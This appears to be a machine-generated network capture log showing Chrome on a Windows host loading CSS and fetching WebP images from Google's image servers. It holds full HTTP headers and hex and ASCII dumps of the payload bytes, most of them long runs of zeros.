                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 31 66 72 20 31 66 72 3b 67 61 70 3a 63 61 6c 63 28 76 61 72 28 2d 2d 68 73 77 2d 67 72 69 64 2d 63 6f 6c 75 6d 6e 2d 77 69 64 74 68 29 20 2a 20 30 20 2b 20 76 61 72 28 2d 2d 68 73 77 2d 67 72 69 64 2d 67 61 70 2d 77 69 64 74 68 29 20 2a 20 28 31 29 29 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 2e 5f 63 6f 6c 75 6d 6e 73 5f 31 66 73 74 68 5f 32 38 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 67 61 70 3a 30 70 78 7d 7d 2e 5f 62 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 5f 31 66 73 74 68 5f 34 30 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 63 65 30 7d 2e 5f 62 75
                                                                                                                                                                                                                                                                                          Data Ascii: template-columns:1fr 1fr;gap:calc(var(--hsw-grid-column-width) * 0 + var(--hsw-grid-gap-width) * (1))}@media (max-width: 1023px){._columns_1fsth_28{display:flex;flex-direction:column;gap:0px}}._buttonContainer_1fsth_40{border-bottom:1px solid #dadce0}._bu
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 73 5f 31 78 76 72 36 5f 32 35 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 4e 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 66 65 61 74 75 72 65 2d 73 65 74 74 69 6e 67 73 3a 22 63 6c 69 67 22 20 6f 66 66 2c 22 6c 69 67 61 22 20 6f 66 66 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 63 6f 6c 6f 72 3a 23 34 32 38 35 66 34 7d 2e 5f 72 65 61 64 4c 65 73 73 5f 31 78 76 72 36 5f 32 35 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 5f 72 65 61 64 4d 6f 72 65 49
                                                                                                                                                                                                                                                                                          Data Ascii: s_1xvr6_25{font-family:Google Sans,Roboto,Noto,sans-serif;font-size:16px;line-height:24px;font-weight:500;color:currentColor;font-feature-settings:"clig" off,"liga" off;margin-top:8px;display:flex;color:#4285f4}._readLess_1xvr6_25{display:none}._readMoreI


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          138192.168.2.750102142.250.185.1934435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC819OUTGET /zVX_dAFZOrsdAax2aYItNILgBV4SU93ES5ih12EORRQ4TqiRa7eSbTllW__cwtNCypVoytKiX1opH0Nk4s3MjoB3baA9d-6kwdq2=s0-rw-e365 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 157918
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 11:15:55 GMT
                                                                                                                                                                                                                                                                                          Expires: Thu, 26 Dec 2024 11:15:55 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=7776000, no-transform
                                                                                                                                                                                                                                                                                          Age: 12387
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/webp
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC852INData Raw: 52 49 46 46 d6 68 02 00 57 45 42 50 56 50 38 4c ca 68 02 00 2f c7 cb 10 01 0d 75 21 a2 ff c1 52 d0 b6 0d 93 6c fc 51 7f 08 11 31 01 cc 99 90 1c 15 f0 0a a8 2e 28 54 8d 50 a5 59 e2 4c 47 03 31 1d 71 e4 92 95 63 56 de 21 b7 91 e4 48 a2 ff 4e ef 73 f7 44 66 d6 49 44 04 23 b7 6d c3 3c 62 98 6b 38 b6 ce fc a8 ff 57 35 b7 91 f5 3d f0 52 91 54 a5 52 95 54 52 c9 92 ac d8 8e a3 b8 83 e3 1e e7 ae 80 93 59 69 4c f7 70 fa 32 33 33 33 a7 e7 1f 66 86 eb 7b d7 a4 57 4f 33 64 42 6b c6 b7 d3 9d b6 1d c7 31 5b 76 5c 72 d9 25 97 8a 5f 3e b0 f6 39 fb d0 e6 b3 5f 58 9a f6 ff 6f 24 37 92 be 7f 20 22 d2 bb aa 2c b2 c8 22 29 52 b6 e4 45 ed 4a dd 7a a6 7d f7 7a 37 7e 4e eb f7 b4 f3 1e d6 1c ed cd bd 88 d9 f3 78 3f ed 7d 8b 2d 8a b2 c5 21 59 2c 93 59 95 3e 32 80 00 f0 d7 05 6b db
                                                                                                                                                                                                                                                                                          Data Ascii: RIFFhWEBPVP8Lh/u!RlQ1.(TPYLG1qcV!HNsDfID#m<bk8W5=RTRTRYiLp2333f{WO3dBk1[v\r%_>9_Xo$7 ",")REJz}z7~Nx?}-!Y,Y>2k
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          139192.168.2.750101142.250.185.1934435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC819OUTGET /fvNhHugJAnsAS2DJW1V3kQ-0lsCTl2eDWV9NW2p4KXStsynp7EjqGSiACH9xSdCIvPvw0z9l_L7kOtfVZH07iQuasGIGWyFqhpdY=s0-rw-e365 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 67252
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 13:02:22 GMT
                                                                                                                                                                                                                                                                                          Expires: Thu, 26 Dec 2024 13:02:22 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=7776000, no-transform
                                                                                                                                                                                                                                                                                          Age: 6000
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/webp
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC854INData Raw: 52 49 46 46 ac 06 01 00 57 45 42 50 56 50 38 4c a0 06 01 00 2f ad c4 93 00 0d 75 21 a2 ff c1 42 d0 b6 6d 32 f3 67 bd fd 18 22 62 02 e6 93 6e 87 94 b6 98 4f 7d d8 ff bb 8e db 46 df 0b 60 00 0c 66 00 ce 70 58 24 0c 29 99 94 2c 4e 1c 5a 96 9c a1 f5 c4 45 85 ee 7e 62 d1 29 ce ba 70 1b 9d c6 ec 93 9e 28 95 db f4 57 a8 14 6d 1a b7 49 d9 42 ed 6a e5 34 d2 45 f6 63 85 76 1a 13 9a 74 59 d5 19 15 52 36 39 b0 49 4e c7 0c ea 2d 4f 39 f7 dc 73 7e e7 e0 e2 00 97 7f f8 da b6 6d 75 db 6c db b6 63 9c 63 88 25 43 e4 30 a7 49 9d 94 b9 5d 96 9b 99 99 99 f1 47 5c f3 d7 7d 4f 5e f0 1b 68 ee 66 a6 32 b7 21 37 6d e2 dc a9 1d 27 96 ec 48 b2 34 a4 31 c6 79 9e bb af 6d db 96 b7 b1 6d eb ba df 8f 44 96 64 29 a6 c4 4e e2 38 e5 14 37 4e 1a 33 73 67 ee 7d 8f fb 26 ee 71 ef 3f 80 99 99
                                                                                                                                                                                                                                                                                          Data Ascii: RIFFWEBPVP8L/u!Bm2g"bnO}F`fpX$),NZE~b)p(WmIBj4EcvtYR69IN-O9s~mulcc%C0I]G\}O^hf2!7m'H41ymmDd)N87N3sg}&q?
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
